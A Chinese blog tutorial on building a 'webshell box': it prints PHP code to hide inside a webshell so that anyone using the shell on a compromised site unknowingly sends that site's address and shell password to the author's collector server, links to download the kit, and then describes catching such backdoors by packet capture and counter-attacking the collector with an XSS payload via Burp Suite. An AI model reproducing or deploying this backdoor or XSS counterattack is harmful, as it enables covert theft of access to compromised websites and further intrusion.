“黑吃黑”webshell箱子

什么是webshell箱子？通俗一点的解释：
它可以让你在webshell中植入后门，当别人用你植入过后门的webshell去获取渗透别的网站时，你的webshellbox信封将会收到他留下的后门地址以及密码

---

环境准备

搭建一个asp的服务器，我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.zip下载完成后解压到虚拟机里面。
箱子：https://pan.baidu.com/s/1D3msIms4Rcf098fqWdQgzQ
提取码：6666
细节我就不说了，搭建至下图这一步

马中马

插入到大马的代码中：

<?php
//假设这是某大马的php文件
//某大马的后门密码变量如下
$password='admin';
//马中马[doge]
$u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"];
echo "<script src='http://192.168.56.104/api.asp?url=$u&pass=$password'></script>
";
?>

解释：
&_SERVER["PHP_SELE"];正在执行的脚本文件名
$_SERVER["HTTP_HOST"];获取当前请求的host头部内容（网站地址）
上面两句实现获取当前网站的ip地址
echo "<script..../script>";指向信封（webshellbox）当大马获取的东西，你的webshellbox也能获取一份
另外：echo这句语法可以在webshellbox文件中查看到（ASP的就用第一句、PHP的就用第二句）：

最后访问网站后，webshell自动获取了大马的后门，以及后门密码

预防后门

如何判断自己使用的大马中没有被植入后门呢？
一般可以采用抓包，查看大马中有没有向一些奇怪的网站发送包

当找到后门地址后，甚至可以采用xss跨站攻击盗取cookie进行反杀…

反杀webshellbox

采用burpsuite抓包，抓到后门包后，将pass改为xss跨站攻击代码

当登录到后台查看时，成功爆出跨站代码

相关文章：

你知道吗？你用的大马可能早就被植入了后门！
如何利用xss拿下一个站的权限？
渗透测试常用靶场集合

“黑吃黑”webshell箱子相关推荐

1. 网络安全学习--014--木马及木马后门的讲解，webshell箱子溯源追踪

   提示:本文所讨论的技术仅用于研究学习,旨在提高大家信息安全意识,任何人不得将其用于非法目的. @木马及木马后门的讲解,webshell箱子溯源追踪 一:webshell制作原理 webshell:即w ...

2. php箱子,webshell箱子php版本.rar

   压缩包 : webshell箱子php版本.rar 列表 api.php config.php index.php 安装说明.txt admin/config.php admin/exit.php a ...

3. WebShell箱子简介与原理

   今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell箱子简介与原理. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严 ...

4. WebShell后门检测与WebShell箱子反杀

   今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子反杀. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果 ...

5. 网络小黑揭秘系列之黑产江湖黑吃黑—中国菜刀的隐形把手

   360安全卫士 · 2016/02/26 14:11 Author:360天眼安全实验室 0x00 引子 人在做,天在看. 黑产乃法外之地,被丛林法则所支配.没有了第三方强制力量的保障和监督,在那个圈 ...

6. 渗透知识-脚本木马的制作原理

   一.webshell制作原理 1.webshell种类 一句话木马(使用的最多).小马.大马.打包马.脱裤马等等 2.一句话木马 介绍:短小精悍,并且功能强大.隐蔽性非常好,在入侵种始终扮演着非常重要 ...

7. web 渗透【4】脚本马的制作与原理

   webshell制作原理 webshell种类 一句话马(使用的最多).小马.大马.打包马.脱裤马... 一句话: 介绍:短小精悍,并且功能强大.隐蔽性非常好,在入侵种始终扮演着非常重要的角色 e.g ...

8. XSS漏洞讲解与多篇实战讲解

   跨站脚本攻击 XSS攻击基础 概述 个人对XSS攻击的原理认知: 原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者 ...

9. 最详细的语言***教程大全

   最详细的语音***教程大全 http://pan.baidu.com/s/1ANdXc 寻找程序漏洞之狂扫目录 http://pan.baidu.com/s/1ntA0BbF Google Hack语 ...

最新文章

1. 如何处理单元测试产生的数据，下列哪些说法是正确的
2. Linux中光盘使用的文件类型,linux下mount命令使用详解---linux挂载光盘等文件系统...
3. 类的成员包含 java_Java 面向对象（十五）类的成员 之 内部类
4. Hibernate_13_QBC查询
5. MySQL基础总结(一)
6. Qt之系统托盘（QSystemTrayIcon详解）
7. MongoDB安装配置(Windows)
8. Silverlight编译过程
9. UE4 C++ Base64编解码
10. JSP基本语法(2)函数
11. [渝粤教育] 浙江大学 设计思维与创新设计 参考 资料
12. 【HTML 5】HTML5 Canvas rect(), strokeRect() 和 fillRect() 的区别
13. vue element ui合并表格（合并某列的行数据）
14. 同步BUCK死区时间产生电路原理及仿真
15. MySQL最全整理（面试题+笔记+导图），面试大厂不再被MySql难倒
16. 用Java实现，把Byte,相应的转换为KB,MB，GB，TB
17. 400 (Bad Request)错误的解决方法
18. 论字母导航的重要性，我们来实现一个联系人字母导航列表吧！
19. .NFT Framework简介
20. 面试题：1000瓶酒找1瓶毒酒

热门文章

1. Django REST Framework中的Serializer relations
2. pyscripter与python的关系_Pyscripter是python下一个非常流行的开源IDE
3. Java 版植物大战僵尸思路和源码分享！
4. 邮件营销 – 电子邮件营销的20个技巧
5. VS2010的aspx文件中的html代码的格式化整理的方法
6. ios11修改微信步数_你会时常去看他的微信步数吗？
7. 2022全新玖五社区系统源码V9.8版
8. Linux预处理功能,ZABBIX4.2预处理新功能---数据节流THROTTLING
9. ros rviz显示rosbag中的图像和imu数据
10. UML交互图（时序图、顺序图、序列图是一样的、协作图）